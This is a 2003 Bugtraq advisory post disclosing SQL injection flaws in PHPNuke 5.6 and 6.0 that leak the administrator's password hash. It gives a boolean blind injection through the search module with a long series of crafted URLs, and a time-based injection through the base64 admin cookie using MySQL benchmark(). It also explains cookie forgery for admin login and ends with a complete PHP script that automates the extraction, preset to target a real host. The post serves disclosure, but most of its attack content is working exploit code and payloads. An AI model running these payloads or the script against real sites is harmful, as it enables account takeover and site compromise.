Bugtraq mailing list archives

PHPNuke SQL Injection

From: Lucas Armstrong <lucas () cgishield com>
Date: 20 Feb 2003 20:36:11 -0000


PHPNuke SQL Injection 2-18-2003
http://CGIshield.com

How to steal the password hash of the Admin user on PHPnuke 6.0 & 5.6 
windows+linux method #1

PHPnuke, a widely used open-source web portal system, has been found to 
contain a remotely exploitable SQL injection bug, which allows stealing of 
the administrator's password hash. With the hash, an attacker may login 
and gain complete control of the administrative side of the system.


The bug exists in the search engine included with PHPnuke 
(/modules/search/index.php). In this file, a database call is made without 
placing quotes around a user supplied variable. Since the database call 
selects information from the user table, a hacker can use a 'select fish' 
attack. In this type of attack, the hacker can determine the value of a 
single character in any given column in the table specified in the 
statement. The column of most importance to a hacker would be the one 
holding the administrators encrypted password. 
Since the passwords in PHPnuke (and many other programs) are an md5 hash, 
there are only 16 possible values for each character and 32 total 
characters to expect. Select fishing involves utilizing the MySQL mid() 
function to return true if the character is guessed correctly, thereby 
returning a set of results to the screen. If the results show up on the 
screen, the attacker can determine that the character is guessed 
correctly, and then proceed to guess the next character in the sequence. 
Any  md5 password hash can be fished in less than 512 (32*16) guesses. 
When done by hand, this can take anywhere from 20-30 minutes, but when the 
process is automated with a program it can take only a few minutes. One 
such program is included at the end of this document.

The first url the hacker would try could look like this:
http://site/modules.php?
name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1)
=6&type=stories

When phpnuke queries the mysql database, the query then looks like this:

"select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, 
s.bodytext, a.url, s.comments, s.topic from nuke_stories s, nuke_authors a 
where s.aid=a.aid AND (s.title LIKE '%%' OR s.hometext LIKE '%%' OR 
s.bodytext LIKE '%%' OR s.notes LIKE '%%') AND TO_DAYS(NOW()) - TO_DAYS
(time) <= 1 or mid(a.pwd,1,1)=6 ORDER BY s.time DESC LIMIT 0,10"

It would check the admin table to see if the first character in the pwd 
(password) column is equal to a value of '6'. If any admin password begins 
with a value of '6', stories written by that admin will appear on the 
screen. If no admin password begins with a value of '6', or the admin has 
written no stories, then the screen will list no story results.


example admin's hash: 6a204bd89f3c8348afd5c77c717a097a

will the admin's stories show with the following urls called?

(*note* in version 6.0 a check for '()' in any GET variable was added on 
line 36 of mainfile.php , therefore the following data strings will only 
work via POST in version 6.0 or later. The exploit included at the end of 
this file works via POST.)

modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=1&type=stories              NO
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=2&type=stories              No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=3&type=stories              No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=4&type=stories              No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=5&type=stories              No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=6&type=stories              Yes
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=7&type=stories              No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=8&type=stories              No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=9&type=stories              No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=0&type=stories              No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=char(97)&type=stories       No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=char(98)&type=stories       No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=char(99)&type=stories       No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=char(100)&type=stories      No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=char(101)&type=stories      No
modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid
(a.pwd,1,1)=char(102)&type=stories      No


To guess the next character in the sequence the attacker could use the 
following url:
http://site/modules.php?
name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,2,1)
=1&type=stories

and so forth, until all values are determined. When guessing values from a-
f, these values normally would need to be surrounded by single quotes. 
This presents a problem for PHP and other applications which normally 
escape quotes. To get around this problem, one could use the mysql char() 
function which will output any ascii value, without using quotes. So to 
guess the letter 'a' the hacker could use char(97). Here is an example url 
guessing the 3rd character in the pwd column as 'a':
http://site/modules.php?
name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char
(97)&type=stories


Now that the attacker determines the password hash of the admin user, he 
can base64 encode the hash (which is what phpnuke expects) and place it in 
a netscape cookie file, and gain access to the target site. If the admin's 
password is 'admin' and the admin's username is 'admin' then you would 
take the value 'admin:admin:' and base64 encode it, put it in the cookie 
(the variable of the encoded values is itself 'admin') the end result 
would look similar to this (on localhost):

lang
english
localhost/html/
1024
1809931264
29595766
4083407360
29522340
*
admin
YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6
localhost/html/
1024
3858912640
29529535
3993654000
29523500
*












How to steal the password hash of the Admin user on PHPnuke 6.0 & 5.6 
windows+linux method #2

PHPnuke, a widely used open-source web portal system, has been found to 
contain a remotely exploitable SQL injection bug, which allows stealing of 
the administrator's password hash. With the hash, an attacker may login 
and gain complete control of the administrative side of the system.

The bug exists due to the format of the admin user's cookies. In PHPnuke 
the admin credentials are stored in the form: 'username:password:', with 
the password md5 encrypted, and the entire string base64 encoded. 

Everytime a webpage is requested on the site running PHPnuke, the 'admin' 
cookie variable (which contains the username/password value) is sent to 
the script, and everytime its validity is checked in the auth.php file. 
Here is the key code in auth.php which does the check:

// start code

if(isset($admin) && $admin != "") {
  $admin = base64_decode($admin);
  $admin = explode(":", $admin);
  $aid = "$admin[0]";
  $pwd = "$admin[1]";
  $admlanguage = "$admin[2]";
  if ($aid=="" || $pwd=="") {
    $admintest=0;
    echo "<html>\n";
    echo "<title>INTRUDER ALERT!!!</title>\n";
    echo "<body bgcolor=\"#FFFFFF\" text=\"#000000\">\n\n<br><br><br>\n\n";
    echo "<center><img src=\"images/eyes.gif\" border=\"0\"><br><br>\n";
    echo "<font face=\"Verdana\" size=\"+4\"><b>Get Out!
</b></font></center>\n";
    echo "</body>\n";
    echo "</html>\n";
    exit;
  }
  $result=sql_query("select pwd from ".$prefix."_authors where 
aid='$aid'", $dbi);
  if(!$result) {
        echo "Selection from database failed!";
        exit;
  } else {
    list($pass)=sql_fetch_row($result, $dbi);
    if($pass == $pwd && $pass != "") {
        $admintest = 1;
    }
  }
}

// end code


As you notice, the $admin variable is first base64_decoded(), and split 
into the two variables $aid and $pwd. The security problem lies in the 
fact that when a string containing one or more single quote is base64 
encoded, and submitted to the site, it will bypass PHP's automatic 
escaping of GPC variables. Since no additional checks are done to defend 
against an sql injection, an attacker is free to modify the select query 
and determine the admin password hash.


A more advanced version of the select fish attack must take place. This is 
because in order to determine a certain character value, the script has to 
respond in different way if the character guess is correct. This is not 
naturally possible in PHPnuke, but it can be accomplished using mySQL's 
benchmark() to give a delayed page response when the character is guessed 
correctly. 

Now that you are aware of where the sql injection attack occurs, let me 
show the process of how this attack would work by modifying the select 
query:

(`select pwd from ".$prefix."_authors where aid='$aid'`)


lets say the 'admin' user has a password hash 
of '21232f297a57a5a743894a0e4a801fc3'. When we modify the query to check 
if the first digit of the 'admin' password hash is equal to '1', we get 
the following result:


mysql> select pwd from nuke_authors where aid='admin' 
and if(mid(pwd,1,1)=1,benchmark(10000000,encode("AAAA","AAAA")),1)/*;
+----------------------------------+
| pwd                              |
+----------------------------------+
| 21232f297a57a5a743894a0e4a801fc3 |
+----------------------------------+
1 row in set (0.00 sec)


The small query execution time signifies an incorrect guess. Look what 
happens when the attacker correctly guesses that the first character of 
the 'admin' password hash is '2':

mysql> select pwd from nuke_authors where aid='admin' and if(mid(pwd,1,1)
=2,benchmark(20000000, encode("AAAA","AAAA")),1)/*;
Empty set (11.11 sec)

The attacker can prolong the execution time to his or her liking when a 
correct guess occurs by raising the first argument to the benchmark() 
function. By the different server response time , an attacker can 
determine a the admin's password hash one character at a time.







<?php

########## PHPnuke Auto-SelectFish Attacker
########## David () cgishield com
########## works on phpnuke 5.6 and 6.0

// To use this program, simply upload it to a php enabled webserver, and 
execute
// If php times out before the whole password hash is determined, 
// adjust the maximum script execution time in php.ini
// Also, replace following with correct values:

$server="www.phpnuke.org";
$script="/modules.php";

// Title of a story created specifically by the admin who is being hacked.
$data_to_match="Revolution";
$admin_account_name="nukelite";
$beginchar="1";
$endchar="33";



$admin_account_name=urlencode($admin_account_name);
$data_to_match=urlencode($data_to_match);

$checkchar[0]="char(48)";
$checkchar[1]="char(49)";
$checkchar[2]="char(50)";
$checkchar[3]="char(51)";
$checkchar[4]="char(52)";
$checkchar[5]="char(53)";
$checkchar[6]="char(54)";
$checkchar[7]="char(55)";
$checkchar[8]="char(56)";
$checkchar[9]="char(57)";
$checkchar[a]="char(97)";
$checkchar[b]="char(98)";
$checkchar[c]="char(99)";
$checkchar[d]="char(100)";
$checkchar[e]="char(101)";
$checkchar[f]="char(102)";

for($i=$beginchar;$i<$endchar;$i++){
reset($checkchar);
while (list($i2, $i2val) = @each($checkchar)){

$vars="name=Search&query=$data_to_match&topic=&category=&author=$admin_acco
unt_name&days=1000+and+mid(a.pwd,$i,1)=$checkchar[$i2]&type=stories";
        $data=sendToHost("$server",'post',"$script","$vars");

        if (eregi("No matches found to your query","$data")){

        }
else{

echo("<br>$i= $i2"); flush();break;}

        }

}


function sendToHost($host,$method,$path,$data,$useragent=1)
{
        $method = strtoupper($method);
        $fp = fsockopen($host,80);
        fputs($fp, "$method $path HTTP/1.1\n");
        fputs($fp, "Host: $host\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
        fputs($fp, "Content-length: " . strlen($data) . "\n");
        if ($useragent)
                fputs($fp, "User-Agent: Mozilla\n");
        fputs($fp, "Connection: close\n\n");
        if ($method == 'POST')
                fputs($fp, $data);
        while (!feof($fp))
                $buf .= fgets($fp,128);
        fclose($fp);
for($slow=0;$slow<100;$slow++){}

        return $buf;
}


?>


Vulnerability discovered by: David Zentner, david () cgishield com
http://CGIshield.com
Current thread:

PHPNuke SQL Injection Lucas Armstrong (Feb 20)
- Re: PHPNuke SQL Injection Martin Eiszner (Feb 21)
- Re: PHPNuke SQL Injection / General SQL Injection David Walker (Feb 21)
  - Re: PHPNuke SQL Injection / General SQL Injection MightyE (Feb 23)
- <Possible follow-ups>
- RE: PHPNuke SQL Injection Oriol Carreas (Feb 21)